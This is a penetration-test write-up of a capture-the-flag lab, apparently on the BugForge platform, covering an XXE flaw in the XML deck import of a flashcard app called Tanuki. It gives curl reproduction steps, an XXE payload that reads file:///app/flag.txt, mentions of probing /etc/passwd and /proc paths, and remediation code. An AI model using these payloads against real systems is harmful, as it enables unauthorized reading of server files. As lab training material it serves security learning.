Tanuki: Arbitrary File Read via XXE on XML Deck Import (2026-05-08 rotation)
Part 1 — Pentest Report
Executive Summary
Tanuki is a spaced repetition flashcard study app served from BugForge: React SPA + Express JSON API, Anki-derived SRS terminology, Japanese cultural framing. Users register, study seeded decks, and can import custom decks via file upload. The frontend file picker on the import page declares accept=".json,.xml", which surfaces an XML parser path the user-facing flow does not exercise. The XML parser resolves DOCTYPE-declared external entities and persists their expansion into the deck/card record, which is then echoed back via GET /api/decks/:id and GET /api/study/:deckId/cards.
Testing confirmed 1 finding:
| ID | Title | Severity | CVSS | CWE | Endpoint |
|---|---|---|---|---|---|
| F1 | XXE via XML Deck Import (External Entity Expansion) | High | 7.5 | CWE-611, CWE-827 | POST /api/decks/import |
The flag was retrieved by registering an account, mirroring a JSON deck shape into an XML body to confirm the parser path was live, then submitting an XML deck containing <!DOCTYPE deck [<!ENTITY xxe SYSTEM "file:///app/flag.txt">]> with &xxe; placed in the description and a card front. Reading the deck back via GET /api/study/:id/cards returned the entity-expanded card front, with the flag in plaintext.
This is a lab-name rotation of the prior tanuki XXE engagement (2026-03-17). Same lab name, same vuln class, different lab build. The container hint string indicator pattern from the prior engagement was directly applied here.
Objective
Capture the lab flag (BugForge bug{...} format) from the Tanuki spaced repetition flashcard app.
Scope / Initial Access
# Target Application
URL: https://lab-1778111135105-ut5hno.labs-app.bugforge.io
# Auth details
Registration: POST /api/register {username, email, password, full_name}
Token format: JWT HS256, payload {id, username, iat} (no role claim)
Starting privileges: anonymous (registration is open and unauthenticated)
Registration is fully open. The JWT it returns carries no role claim, so role is read server side from the user record on each authenticated request. GET /api/verify-token returns the full user record including role. The same JWT authorizes the deck import endpoint where the bug lives.
Reconnaissance — Reading the Bundle for the Parser Inventory
Reconnaissance focused on the React bundle (/static/js/main.2a8c2eb1.js) and the response shapes from registration and the deck endpoints. The bundle was unminified enough to surface input element attributes, route paths, and the admin gate logic; no source maps were exposed.
- The import page’s file picker declares
accept=".json,.xml". Two formats means two parsers wired server side. The user-facing flow (the docs and seeded UX) is JSON deck import; XML is the format that does not appear in the UX but is still wired in. That mismatch is the recon premise that promotes XXE to the top of the hypothesis board. - The frontend renders the
/adminlink only whenuser.role === "admin". This is a frontend-side gate; the server side check is unknown until we hit/api/admin/*directly. Cheap to test in isolation. - The JWT carries
{id, username, iat}and no role claim. Role is fetched server side viaGET /api/verify-tokenon app load. Same architecture as the prior bugforge-cheesy-does-it lab (template reuse), which suggests the same team’s authentication and authorization wiring patterns. - Sequential integer IDs on decks, cards, and users. Our JWT id was 4, which means at least three accounts predated ours (likely admin and two seeded customers). IDOR is on the board but not the cheapest probe.
Application Architecture
| Component | Detail |
|---|---|
| Backend | Node.js / Express (X-Powered-By: Express on every response) |
| Frontend | React + Material-UI single page application (build hash main.2a8c2eb1.js, ~516KB) |
| Auth | JWT HS256, payload {id, username, iat}, no role claim |
| CORS | Access-Control-Allow-Origin: * on every response |
| Database | Relational, snake_case schema (card_count, cards_studied, user_id), sequential integer IDs |
API Surface
| Endpoint | Method | Auth | Notes |
|---|---|---|---|
| /api/register | POST | none | Open registration; field allowlist enforced server side |
| /api/login | POST | none | Returns {token, user} |
| /api/verify-token | GET | JWT | Returns user including role |
| /api/decks | GET | JWT | Lists three seeded decks (id 1, 2, 3) |
| /api/decks/:id | GET | JWT | Single deck details |
| /api/decks/import | POST | JWT | Multipart upload, accepts .json and .xml |
| /api/study/:deckId/cards | GET | JWT | Returns cards with front, back, SM-2 fields |
| /api/study/progress | POST | JWT | SM-2 review submission |
| /api/study/sessions | GET | JWT | Lists user’s own sessions |
| /api/stats | GET | JWT | Aggregate stats |
| /api/admin/users | * | admin | Server enforced role check (returns 403 for non-admin) |
| /api/admin/decks | * | admin | Server enforced role check |
| /api/admin/cards | * | admin | Server enforced role check |
Attack Chain Visualization
┌──────────────────┐ ┌──────────────────┐ ┌──────────────────┐ ┌──────────────────┐ ┌──────────────────┐
│ POST /register │ │ FE accept= │ │ Benign XML deck │ │ XML <!DOCTYPE> │ │ GET /api/study/ │
│ open register │──▶│ ".json,.xml" │──▶│ shape mirror │──▶│ &xxe; → │──▶│ N/cards reads │
│ → our JWT │ │ XML parser wired │ │ → parser alive │ │ /app/flag.txt │ │ flag in front │
└──────────────────┘ └──────────────────┘ └──────────────────┘ └──────────────────┘ └──────────────────┘
Findings
F1 — XXE via XML Deck Import (External Entity Expansion)
Severity: High
CVSS v3.1: 7.5 — CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
CWE: CWE-611 (Improper Restriction of XML External Entity Reference), CWE-827 (Improper Control of Document Type Definition)
Endpoint: POST /api/decks/import
Authentication required: Yes (any registered user; registration is open)
Description
The deck import endpoint accepts XML files and parses them with a parser that resolves DOCTYPE-declared external entities. Entity references placed in deck or card fields (e.g. <description> or a card’s <front>) are expanded into the persisted record at parse time, then echoed back when the deck is read via GET /api/decks/:id or GET /api/study/:deckId/cards. Combined with file:// URIs in the SYSTEM identifier, this lets an attacker read arbitrary local files that the application user has read access to.
PR:N reflects open public registration: any unauthenticated party can register and reach the endpoint in two requests, so the chain effectively starts unauthenticated. C:H reflects the demonstrated arbitrary file read disclosing the lab flag at /app/flag.txt. I:N and A:N reflect that the demonstrated impact is read-only file access without integrity or availability degradation.
Impact
Arbitrary local file read on the application container. The application user’s filesystem is exposed including any application-controlled secrets, source files, and configuration left in readable paths. The lab flag was disclosed from /app/flag.txt.
Reproduction
Step 1 — Register and capture the JWT
curl -sX POST https://lab-1778111135105-ut5hno.labs-app.bugforge.io/api/register \
-H 'Content-Type: application/json' \
-d '{"username":"haxor","email":"[email protected]","password":"password","full_name":""}'
# → 200 with {token, user}; our id is 4
Capture the token value as $TOKEN for subsequent requests.
Step 2 — Confirm the XML parser path is live
Before sending an entity-bearing payload, mirror the JSON deck shape into XML and submit a benign version. A clean import means the XML parser path is live, so the next request can carry the heavy payload.
<deck>
<name>XMLProbe</name>
<description>probe</description>
<category>Probe</category>
<cards>
<card><front>front1</front><back>back1</back></card>
</cards>
</deck>
curl -sX POST https://lab-…/api/decks/import \
-H "Authorization: Bearer $TOKEN" \
-F "[email protected];type=application/xml"
# → {"id":5,"message":"Deck imported successfully","cards_count":1}
Step 3 — Submit an XXE payload targeting the flag
<?xml version="1.0"?>
<!DOCTYPE deck [<!ENTITY xxe SYSTEM "file:///app/flag.txt">]>
<deck>
<name>x</name>
<description>flag:&xxe;</description>
<category>x</category>
<cards>
<card><front>flag-front:&xxe;</front><back>x</back></card>
</cards>
</deck>
curl -sX POST https://lab-…/api/decks/import \
-H "Authorization: Bearer $TOKEN" \
-F "[email protected];type=application/xml"
# → {"id":6,"message":"Deck imported successfully","cards_count":1}
Step 4 — Read the deck back to recover the entity expansion
curl -s -H "Authorization: Bearer $TOKEN" https://lab-…/api/study/6/cards
# → {"front":"flag-front:bug{wlOG9b2NIVNP7JHbNZVr0dQQoTBB0cJA}", ...}
Flag: bug{wlOG9b2NIVNP7JHbNZVr0dQQoTBB0cJA}
Container Note
The application container has been built with several common recon paths replaced. /etc/passwd, /proc/self/cmdline, /proc/self/cwd/package.json, and /app/package.json all return the literal string “Flag is in a different file” rather than the expected file content. This is a hint string indicator, not a sandbox: the entity reference resolves and a string is returned, but the string is the lab author’s intentional decoy. The /app/flag.txt path is left untouched and reads cleanly. Pivoting from system paths to app paths via a batched 5-entity scan in one DOCTYPE landed the flag on the second exploit request. The pattern was previously documented from the 2026-03-17 tanuki engagement and applied directly here.
Remediation
Fix 1 — Reject DTD declarations and disable entity expansion
// BEFORE (Vulnerable)
const libxml = require('libxmljs');
app.post('/api/decks/import', upload.single('file'), (req, res) => {
const xmlBody = req.file.buffer.toString();
const doc = libxml.parseXml(xmlBody); // entities expanded by default
const deck = parseDeckFromXml(doc);
saveDeck(deck);
res.json({ id: deck.id, message: 'Deck imported successfully' });
});
// AFTER (Secure)
const libxml = require('libxmljs');
app.post('/api/decks/import', upload.single('file'), (req, res) => {
const xmlBody = req.file.buffer.toString();
// Reject any DTD or entity declarations before parsing
if (/<!DOCTYPE|<!ENTITY/i.test(xmlBody)) {
return res.status(400).json({ error: 'DTD declarations are not permitted' });
}
const doc = libxml.parseXml(xmlBody, {
noent: false, // do not substitute entity references
noblanks: true,
recover: false
});
// Allowlist deck fields at the deserialization boundary
const deck = {
name: doc.get('//name')?.text(),
description: doc.get('//description')?.text(),
category: doc.get('//category')?.text(),
cards: extractCards(doc)
};
saveDeck(deck);
res.json({ id: deck.id, message: 'Deck imported successfully' });
});
The pre-parse reject pattern catches DOCTYPE before it hits the parser. The parser flags ensure that even if a DOCTYPE slips through (e.g. in a nested or otherwise formatted way), entity references are not substituted.
Fix 2 — Drop the XML format from the file picker if not needed
The user-facing flow is JSON deck import. If XML support is not a product requirement, remove .xml from the accept= attribute and reject XML server side too. Reducing the parser inventory removes the attack class entirely, which is strictly safer than hardening a parser for a format that no user actually needs.
Fix 3 — Sandbox the application user’s filesystem
Even with parser hardening, the application container should not have readable secrets sitting in /app. Move secrets to environment variables or an external secret store. Mount the application directory read-only where possible. Treat any arbitrary file read as the floor for impact; a hardened filesystem layout limits how bad that floor is.
Additional recommendations:
- Validate uploaded files against an extension and content type allowlist before opening them with a parser. A
.xmlfilename with a JSON body, or a.jsonfilename with an XML body, should be rejected on the basis of the extension/content type mismatch. - If multi-format deck import is a requirement, document the supported parsers in an upload spec and harden each one explicitly. Multi-format file upload is a single feature with multiple attack classes; the hardening checklist should be explicit per format.
OWASP Top 10 Coverage
- A03:2021 — Injection: XXE is a server-side injection where parser-controlled tokens (entity references) escape from data into a side channel (file read). The XML deck body is data, but the DOCTYPE is parser instruction.
- A05:2021 — Security Misconfiguration: The XML parser is configured with default-permissive entity resolution. The multi-format file upload exposes a parser that the user-facing flow does not need.
- A04:2021 — Insecure Design: The import surface ships with no parser hardening or per-format threat model. The frontend
accept=attribute advertises an attack surface that did not need to exist.
Tools Used
| Tool | Purpose |
|---|---|
| Caido | Proxy for crafting and replaying multipart uploads with arbitrary inner Content-Type |
| curl | Reproducible request flow documented in the writeup |
| Browser DevTools | Bundle reading (/static/js/main.2a8c2eb1.js) for the accept= attribute and route inspection |
Discovered skill xxe-container-file-enumeration |
Pattern from a prior tanuki engagement: container hint string indicator + batched entity scan across candidate app paths |
References
- CWE-611: https://cwe.mitre.org/data/definitions/611.html
- CWE-827: https://cwe.mitre.org/data/definitions/827.html
- OWASP XML External Entity Prevention Cheat Sheet: https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html
- OWASP A03:2021 Injection: https://owasp.org/Top10/A03_2021-Injection/
- Prior tanuki XXE writeup (2026-03-17):
tanuki-xxe.md
Part 2 — Notes / Knowledge
Key Learnings
-
A multi-format file upload runs one parser per format, and every format on that list is its own attack class. XML invites XXE, YAML invites deserialization, archives invite zip slip, JSON invites prototype pollution and mass assignment, CSV invites formula injection. The frontend input’s
accept=attribute is the cheapest signal of which formats are wired. Read it during recon, treat each entry as a separate hypothesis, and don’t default to the format the docs or UX show. -
Send a parser-alive probe before any heavy parser-target payload. Mirror the documented shape (often the JSON example) into the candidate format and submit a benign version. Clean import means the parser is wired; send the attack payload next request. Format-specific 400 means parser alive but rejecting your shape; iterate. Generic “unsupported file type” means the parser is inactive for this format; move on. Applies to XXE, deserialization, prototype pollution, zip slip, formula injection: anywhere a heavy probe risks burning against a dead branch.
Failed Approaches
| Approach | Result | Why It Failed |
|---|---|---|
Direct GET /api/admin/users with a non-admin JWT (frontend-only admin gate hypothesis) |
403 Forbidden, body {"error":"Admin access required"} |
Server enforces role server side. Same template wiring as bugforge-cheesy-does-it (identical error string). |
Mass assignment of role:"admin" on POST /api/register |
Server returns user object without echoing role; /api/verify-token confirms role:"user" on the resulting JWT |
Register handler applies a field allowlist; arbitrary fields in the body are dropped. |
First XXE attempt with file:///etc/passwd and other system paths (/proc/self/cmdline, /proc/self/cwd/package.json, /app/package.json) |
All four returned the literal string “Flag is in a different file” rather than the expected file content | Container build replaces popular recon paths with a hint string. The pivot to the flag direct path (/app/flag.txt) was the load-bearing step. |
Tags: #bugforge #webapp #xxe #file-upload #xml #multipart #parser-alive-probe #container-hint #cwe-611 #cwe-827
Document Version: 1.0
Last Updated: 2026-05-08